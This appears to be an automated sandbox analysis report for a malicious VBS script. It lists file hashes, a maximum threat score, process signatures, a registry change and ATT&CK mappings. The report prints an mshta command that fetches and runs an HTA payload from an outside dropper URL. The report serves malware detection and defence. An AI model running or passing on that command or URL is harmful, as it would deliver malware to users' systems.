1639941c1b2e7451245160fa41afe0c97a25b12c6b97b1280e9e340f0c79d29d

Analysis

max time kernel
45s
max time network
49s
platform
windows7_x64
resource
win7-20220715-en
resource tags

arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system
submitted
09-08-2022 18:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DWRNHNKWSJEHWYPNYOGGOP.vbs
Size

1KB
MD5

43f89bd927a7e80c8240c61617dee7bf
SHA1

6a8ab5c11c1afd276cf5dbb7b125cff26080459f
SHA256

f835187e4e7703e00b2da9f5cca7b9a4ab87d26d27b09e5112d563f6f96dcc9a
SHA512

f637d2cdbd59a730b65c770d66c2767febe5f9e8662d133717922990fbf3934a4026b5929960c8dfbfdb228cf164b9390badbc92b19dde11f9ebe5a1018379e4

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://tradeguru.com.pk/enc2.txt

Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

MSHTA.EXE

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1552 1648 MSHTA.EXE
Blocklisted process makes network request 4 IoCs

Processes:

MSHTA.EXE

flow pid process

4 1552 MSHTA.EXE
5 1552 MSHTA.EXE
6 1552 MSHTA.EXE
7 1552 MSHTA.EXE
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

MSHTA.EXE

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main MSHTA.EXE

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1552	1648	MSHTA.EXE

flow	pid	process
4	1552	MSHTA.EXE
5	1552	MSHTA.EXE
6	1552	MSHTA.EXE
7	1552	MSHTA.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main	MSHTA.EXE

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DWRNHNKWSJEHWYPNYOGGOP.vbs"
1⤵
PID:1972

C:\Windows\system32\MSHTA.EXE
MSHTA.EXE https://tradeguru.com.pk/enc2.txt
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:1552

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads